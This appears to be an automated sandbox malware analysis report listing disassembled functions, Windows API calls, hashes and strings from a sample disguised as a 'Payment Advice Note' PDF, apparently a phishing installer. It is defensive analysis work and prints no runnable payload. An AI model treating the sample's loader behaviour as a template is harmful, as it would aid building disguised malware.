Associated: 00000000.00000002.1303900007.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1303900007.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1303900007.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1304115213.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Payment Advice Note_Pdf.jbxd

Similarity

API ID: PrivateProfileString
String ID:
API String ID: 1096422788-0
Opcode ID: 66f8b3e970e184d3ebc304a94ec291b034400799dc8d029390466380a40aecae
Instruction ID: 98211d2feed0509b4c5daa86fa820328d7278c452558b0b50cc2825d3d111cbc
Opcode Fuzzy Hash: 66f8b3e970e184d3ebc304a94ec291b034400799dc8d029390466380a40aecae
Instruction Fuzzy Hash: 64E04F30800204BBDF01AFA4CD49DBD3B79AB00344F14043AF900AB1D5E7F89A809749

Function 0040159B Relevance: 1.5, APIs: 1, Instructions: 18COMMON

Download Yara Rule

APIs

SetFileAttributesW.KERNELBASE(00000000,?,000000F0), ref: 004015A6

Memory Dump Source

Source File: 00000000.00000002.1303817138.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1303789428.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1303870127.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1303900007.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1303900007.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1303900007.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1303900007.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1303900007.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1303900007.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1304115213.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Payment Advice Note_Pdf.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 3e803e02f74c9f88bb83833f4ed5a4af44336c5c42e2fc377601f2590f6e6eb6
Instruction ID: 1b5af1e6617a4a9cd807fc22027cae36a39ca3b3e6b8606dbe65da2ef404c620
Opcode Fuzzy Hash: 3e803e02f74c9f88bb83833f4ed5a4af44336c5c42e2fc377601f2590f6e6eb6
Instruction Fuzzy Hash: 41D01233B04100DBCB10DFA89A0869D77659B40334B208677D501F21E5D6B9C5515A19

Function 0040412F Relevance: 1.5, APIs: 1, Instructions: 9windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00000000,00000000,00000000), ref: 00404141

Memory Dump Source

Source File: 00000000.00000002.1303817138.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1303789428.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1303870127.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1303900007.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1303900007.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1303900007.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1303900007.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1303900007.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1303900007.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1304115213.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Payment Advice Note_Pdf.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: c20ba2f4b44bb730ed9beb80e31de2705d99c650012490af2887c79ee983c6a6
Instruction ID: 1f6dcfa326d5252f97bf96967583e82957cdc04532489552bbed9deb9ca34131
Opcode Fuzzy Hash: c20ba2f4b44bb730ed9beb80e31de2705d99c650012490af2887c79ee983c6a6
Instruction Fuzzy Hash: 26C09B757443017BDA318F509D49F27775867A4700F2544397350F70D0C774E451D61D

Function 00404118 Relevance: 1.5, APIs: 1, Instructions: 6windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000028,?,00000001,00403F44), ref: 00404126

Memory Dump Source

Source File: 00000000.00000002.1303817138.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1303789428.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1303870127.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1303900007.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1303900007.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1303900007.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1303900007.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1303900007.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1303900007.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1304115213.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Payment Advice Note_Pdf.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 60aa1d835f0e1251744f08a8622f304abcf8d31a66d486a38430c06eb2f41270
Instruction ID: 29b39a71cad52391c8dc255d064a3e1ff9ef0cb324877085b5716ecfb2dd3a49
Opcode Fuzzy Hash: 60aa1d835f0e1251744f08a8622f304abcf8d31a66d486a38430c06eb2f41270
Instruction Fuzzy Hash: 80B09236A84200BADA214B00ED09F857A62A76C701F008864B300240B0CAB284A2DB19

Function 00403222 Relevance: 1.5, APIs: 1, Instructions: 6COMMON

Download Yara Rule

APIs

SetFilePointer.KERNELBASE(00000000,00000000,00000000,00402FB5,?,?,?,00000000,00403504,?), ref: 00403230

Memory Dump Source

Source File: 00000000.00000002.1303817138.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1303789428.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1303870127.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1303900007.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1303900007.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1303900007.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1303900007.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1303900007.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1303900007.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1304115213.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Payment Advice Note_Pdf.jbxd

Similarity

API ID: FilePointer
String ID:
API String ID: 973152223-0
Opcode ID: 3f2450370ff6ec370cb83e2696936d8051f71d6c0ea90f8f087f694b7f33879c
Instruction ID: 9708a756cc2c9ae94551e8e9c592081b607f980c3267f7876f2ac268d6c84cd7
Opcode Fuzzy Hash: 3f2450370ff6ec370cb83e2696936d8051f71d6c0ea90f8f087f694b7f33879c
Instruction Fuzzy Hash: B8B01231584200BFDA214F00DE05F057B21A790700F10C030B304381F082712420EB5D

Function 00404105 Relevance: 1.5, APIs: 1, Instructions: 4COMMON

Download Yara Rule

APIs

KiUserCallbackDispatcher.NTDLL(?,00403EDD), ref: 0040410F

Memory Dump Source

Source File: 00000000.00000002.1303817138.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1303789428.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1303870127.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1303900007.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1303900007.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1303900007.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1303900007.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1303900007.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1303900007.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1304115213.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Payment Advice Note_Pdf.jbxd

Similarity

API ID: CallbackDispatcherUser
String ID:
API String ID: 2492992576-0
Opcode ID: d47f543a0a5cf9255e047f9efd0c7089eb13675c2c376fedb6fe0e8f1e294cbf
Instruction ID: 08b0993790eca83da4683932159a1945e4cd9185bce414af844fcd550f832719
Opcode Fuzzy Hash: d47f543a0a5cf9255e047f9efd0c7089eb13675c2c376fedb6fe0e8f1e294cbf
Instruction Fuzzy Hash: 9AA01132808000ABCA028B80EF08C0ABB22FBE0300B008838F2008003083320820EB0A

Function 004014D7 Relevance: 1.3, APIs: 1, Instructions: 17sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(00000000), ref: 004014E6

Memory Dump Source

Source File: 00000000.00000002.1303817138.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1303789428.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1303870127.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1303900007.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1303900007.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1303900007.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1303900007.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1303900007.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1303900007.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1304115213.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Payment Advice Note_Pdf.jbxd

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: 70669ac5e73c5e0fd120337f743f0ec3388cc295a7de1ade3031c69f4afd3847
Instruction ID: 97e26b744c28169e8b025be137c519adc4d29a227e598783c976d4988d520b86
Opcode Fuzzy Hash: 70669ac5e73c5e0fd120337f743f0ec3388cc295a7de1ade3031c69f4afd3847
Instruction Fuzzy Hash: 47D0C977B14100ABD720EFB9AE898AB73ACEB513293204833D902E10A2D579D802866D

Non-executed Functions

Function 00404AFA Relevance: 63.5, APIs: 33, Strings: 3, Instructions: 481windowmemoryCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,000003F9), ref: 00404B12
GetDlgItem.USER32(?,00000408), ref: 00404B1D
GlobalAlloc.KERNEL32(00000040,?), ref: 00404B67
LoadBitmapW.USER32(0000006E), ref: 00404B7A
SetWindowLongW.USER32(?,000000FC,004050F2), ref: 00404B93
ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404BA7
ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404BB9
SendMessageW.USER32(?,00001109,00000002), ref: 00404BCF
SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404BDB
SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404BED
DeleteObject.GDI32(00000000), ref: 00404BF0
SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404C1B
SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404C27
SendMessageW.USER32(?,00001132,00000000,?), ref: 00404CBD
SendMessageW.USER32(?,0000110A,00000003,00000000), ref: 00404CE8
SendMessageW.USER32(?,00001132,00000000,?), ref: 00404CFC
GetWindowLongW.USER32(?,000000F0), ref: 00404D2B
SetWindowLongW.USER32(?,000000F0,00000000), ref: 00404D39
ShowWindow.USER32(?,00000005), ref: 00404D4A
SendMessageW.USER32(?,00000419,00000000,?), ref: 00404E47
SendMessageW.USER32(?,00000147,00000000,00000000), ref: 00404EAC
SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00404EC1
SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00404EE5
SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00404F05
ImageList_Destroy.COMCTL32(?), ref: 00404F1A
GlobalFree.KERNEL32(?), ref: 00404F2A
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00404FA3
SendMessageW.USER32(?,00001102,?,?), ref: 0040504C
SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 0040505B
InvalidateRect.USER32(?,00000000,00000001), ref: 0040507B
ShowWindow.USER32(?,00000000), ref: 004050C9
GetDlgItem.USER32(?,000003FE), ref: 004050D4
ShowWindow.USER32(00000000), ref: 004050DB

Strings

, xrefs: 004050B3
M, xrefs: 00404CA4
N, xrefs: 00404D85

Memory Dump Source

Source File: 00000000.00000002.1303817138.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1303789428.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1303870127.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1303900007.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1303900007.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1303900007.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1303900007.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1303900007.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1303900007.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1304115213.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Payment Advice Note_Pdf.jbxd

Similarity

API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
String ID: $M$N
API String ID: 1638840714-813528018
Opcode ID: 00f807dd19097039cdfae8d42ef0864fc158edb6895af2579c06ee0ad68b6d60
Instruction ID: d9c0fbcad293e7aaadacffa1f228c55c0cff6ebba89157b443eef3cf19c2f35f
Opcode Fuzzy Hash: 00f807dd19097039cdfae8d42ef0864fc158edb6895af2579c06ee0ad68b6d60
Instruction Fuzzy Hash: AF026FB0A00209EFDB209F54DD85AAE7BB5FB84314F10857AF610BA2E1D7799D42CF58

Function 0040457E Relevance: 24.8, APIs: 10, Strings: 4, Instructions: 275stringCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,000003FB), ref: 004045CD
SetWindowTextW.USER32(00000000,?), ref: 004045F7
SHBrowseForFolderW.SHELL32(?), ref: 004046A8
CoTaskMemFree.OLE32(00000000), ref: 004046B3
lstrcmpiW.KERNEL32(Call,00422708,00000000,?,?), ref: 004046E5
lstrcatW.KERNEL32(?,Call), ref: 004046F1
SetDlgItemTextW.USER32(?,000003FB,?), ref: 00404703

Part of subcall function 00405748: GetDlgItemTextW.USER32(?,?,00000400,0040473A), ref: 0040575B

Part of subcall function 004062B3: CharNextW.USER32(00409300,*?|<>/":,00000000,"C:\Users\user\Desktop\Payment Advice Note_Pdf.exe",763C3420,C:\Users\user\AppData\Local\Temp\,00000000,00403245,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403496), ref: 00406316
Part of subcall function 004062B3: CharNextW.USER32(00409300,00409300,00409300,00000000), ref: 00406325
Part of subcall function 004062B3: CharNextW.USER32(00409300,"C:\Users\user\Desktop\Payment Advice Note_Pdf.exe",763C3420,C:\Users\user\AppData\Local\Temp\,00000000,00403245,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403496), ref: 0040632A
Part of subcall function 004062B3: CharPrevW.USER32(00409300,00409300,763C3420,C:\Users\user\AppData\Local\Temp\,00000000,00403245,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403496), ref: 0040633D

GetDiskFreeSpaceW.KERNEL32(004206D8,?,?,0000040F,?,004206D8,004206D8,?,00000001,004206D8,?,?,000003FB,?), ref: 004047C6
MulDiv.KERNEL32(?,0000040F,00000400), ref: 004047E1

Part of subcall function 0040493A: lstrlenW.KERNEL32(00422708,00422708,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 004049DB
Part of subcall function 0040493A: wsprintfW.USER32 ref: 004049E4
Part of subcall function 0040493A: SetDlgItemTextW.USER32(?,00422708), ref: 004049F7

Strings

Call, xrefs: 004046DF, 004046E4, 004046EF
user32::EnumWindows(i r2 ,i 0), xrefs: 00404597
C:\Users\user\toenailed\quoteworthy\Atoning, xrefs: 004046CE
A, xrefs: 004046A1

Memory Dump Source

Source File: 00000000.00000002.1303817138.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1303789428.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1303870127.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1303900007.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1303900007.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1303900007.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1303900007.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1303900007.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1303900007.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1304115213.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Payment Advice Note_Pdf.jbxd

Similarity

API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
String ID: A$C:\Users\user\toenailed\quoteworthy\Atoning$Call$user32::EnumWindows(i r2 ,i 0)
API String ID: 2624150263-1060976677
Opcode ID: 9fff75d44962757429dc3e2902d1974289698b17ee3baa263f594784ad652460
Instruction ID: 5fc8bddc00f1cc174a6dc329f65f284a7a254117467b0892f0b405221262b822
Opcode Fuzzy Hash: 9fff75d44962757429dc3e2902d1974289698b17ee3baa263f594784ad652460
Instruction Fuzzy Hash: D9A150B1D00209ABDB11AFA5CC85AAF77B8EF84315F11843BF611B72D1D77C8A418B69

Function 10001B18 Relevance: 20.0, APIs: 13, Instructions: 544stringmemoryCOMMON

Download Yara Rule

APIs

Part of subcall function 1000121B: GlobalAlloc.KERNEL32(00000040,?,1000123B,?,100012DF,00000019,100011BE,-000000A0), ref: 10001225

GlobalAlloc.KERNEL32(00000040,00001CA4), ref: 10001C24
lstrcpyW.KERNEL32(00000008,?), ref: 10001C6C
lstrcpyW.KERNEL32(00000808,?), ref: 10001C76
GlobalFree.KERNEL32(00000000), ref: 10001C89
GlobalFree.KERNEL32(?), ref: 10001D83
GlobalFree.KERNEL32(?), ref: 10001D88
GlobalFree.KERNEL32(?), ref: 10001D8D
GlobalFree.KERNEL32(00000000), ref: 10001F38
lstrcpyW.KERNEL32(?,?), ref: 1000209C

Memory Dump Source

Source File: 00000000.00000002.1317193990.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.1317160855.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.1317225994.0000000010003000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.1317253099.0000000010005000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_Payment Advice Note_Pdf.jbxd

Similarity

API ID: Global$Free$lstrcpy$Alloc
String ID:
API String ID: 4227406936-0
Opcode ID: e30de6db6a834bf10e5b97208fc3b89c024e60f2dd318f1058e55d56930b3bd8
Instruction ID: 952ca616c20dc2fa21031af5d26a5f3ec91fa4f9dea92b18a1e2b318678e368b
Opcode Fuzzy Hash: e30de6db6a834bf10e5b97208fc3b89c024e60f2dd318f1058e55d56930b3bd8
Instruction Fuzzy Hash: 10129C75D0064AEFEB20CFA4C8806EEB7F4FB083D4F61452AE565E7198D774AA80DB50

Function 00402095 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 129comCOMMON

Download Yara Rule

APIs

CoCreateInstance.OLE32(0040749C,?,00000001,0040748C,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 00402114

Strings

C:\Users\user\toenailed\quoteworthy\Atoning, xrefs: 00402154

Memory Dump Source

Source File: 00000000.00000002.1303817138.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1303789428.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1303870127.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1303900007.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1303900007.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1303900007.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1303900007.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1303900007.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1303900007.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1304115213.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Payment Advice Note_Pdf.jbxd

Similarity

API ID: CreateInstance
String ID: C:\Users\user\toenailed\quoteworthy\Atoning
API String ID: 542301482-3254341927
Opcode ID: f6c9e515521f1fa62750a1a75da94e91cc5d062543102a3a6cbb304dea821779
Instruction ID: 6cbe38940624da38e40774ab578681f1f604b85ca8fb8198b005fe2b44c0e728
Opcode Fuzzy Hash: f6c9e515521f1fa62750a1a75da94e91cc5d062543102a3a6cbb304dea821779
Instruction Fuzzy Hash: A7411D75A00208AFCF00DFA4CD889AD7BB5FF48314B20457AF515EB2D1D7799A41CB55

Function 004027FB Relevance: 1.5, APIs: 1, Instructions: 30fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(00000000,?,00000002), ref: 0040280A

Memory Dump Source

Source File: 00000000.00000002.1303817138.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1303789428.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1303870127.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1303900007.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1303900007.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1303900007.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1303900007.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1303900007.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1303900007.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1304115213.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Payment Advice Note_Pdf.jbxd

Similarity

API ID: FileFindFirst
String ID:
API String ID: 1974802433-0
Opcode ID: 969cbda3b3cfe11703c14b4ce8f4b9b3fb4feaebf9848e8514cb89d3c6c7a4d8
Instruction ID: 5886dfe4bc611d4993f15ed40ae28ce81127269af5662ddb55851ccd49cbf6f1
Opcode Fuzzy Hash: 969cbda3b3cfe11703c14b4ce8f4b9b3fb4feaebf9848e8514cb89d3c6c7a4d8
Instruction Fuzzy Hash: 10F05E71A00115ABC711EFA4DD49AAEB378FF04324F1005BBF105E21E1D6B89A409B29

Function 00404280 Relevance: 40.5, APIs: 20, Strings: 3, Instructions: 207windowstringCOMMON

Download Yara Rule

APIs

CheckDlgButton.USER32(?,-0000040A,00000001), ref: 0040431E
GetDlgItem.USER32(?,000003E8), ref: 00404332
SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 0040434F
GetSysColor.USER32(?), ref: 00404360
SendMessageW.USER32(00000000,00000443,00000000,?), ref: 0040436E
SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 0040437C
lstrlenW.KERNEL32(?), ref: 00404381
SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 0040438E
SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 004043A3
GetDlgItem.USER32(?,0000040A), ref: 004043FC
SendMessageW.USER32(00000000), ref: 00404403
GetDlgItem.USER32(?,000003E8), ref: 0040442E
SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 00404471
LoadCursorW.USER32(00000000,00007F02), ref: 0040447F
SetCursor.USER32(00000000), ref: 00404482
ShellExecuteW.SHELL32(0000070B,open,004271C0,00000000,00000000,00000001), ref: 00404497
LoadCursorW.USER32(00000000,00007F00), ref: 004044A3
SetCursor.USER32(00000000), ref: 004044A6
SendMessageW.USER32(00000111,00000001,00000000), ref: 004044D5
SendMessageW.USER32(00000010,00000000,00000000), ref: 004044E7

Strings

N, xrefs: 0040441C
Call, xrefs: 0040445D
open, xrefs: 0040448F

Memory Dump Source

Source File: 00000000.00000002.1303817138.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1303789428.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1303870127.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1303900007.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1303900007.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1303900007.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1303900007.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1303900007.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1303900007.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1304115213.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Payment Advice Note_Pdf.jbxd

Similarity

API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorExecuteShelllstrlen
String ID: Call$N$open
API String ID: 3615053054-2563687911
Opcode ID: 2c4f6cf5a4aa9f0210a02c82683795d0b5a579b88aa58951f10bca9314f1fa64
Instruction ID: 4b5324550c8b175de7ac8ee9e9744dd98fad869a56f6e91fb07d2f074fcd5292
Opcode Fuzzy Hash: 2c4f6cf5a4aa9f0210a02c82683795d0b5a579b88aa58951f10bca9314f1fa64
Instruction Fuzzy Hash: F87172B1A00209BFDB109F60DD85E6A7B69FB84354F00853AF705B62E1C778AD51CFA9

Function 00401000 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 125COMMON

Download Yara Rule

APIs

DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
BeginPaint.USER32(?,?), ref: 00401047
GetClientRect.USER32(?,?), ref: 0040105B
CreateBrushIndirect.GDI32(00000000), ref: 004010CF
FillRect.USER32(00000000,?,00000000), ref: 004010E4
DeleteObject.GDI32(?), ref: 004010ED
CreateFontIndirectW.GDI32(?), ref: 00401105
SetBkMode.GDI32(00000000,00000001), ref: 00401126
SetTextColor.GDI32(00000000,000000FF), ref: 00401130
SelectObject.GDI32(00000000,?), ref: 00401140
DrawTextW.USER32(00000000,00428220,000000FF,00000010,00000820), ref: 00401156
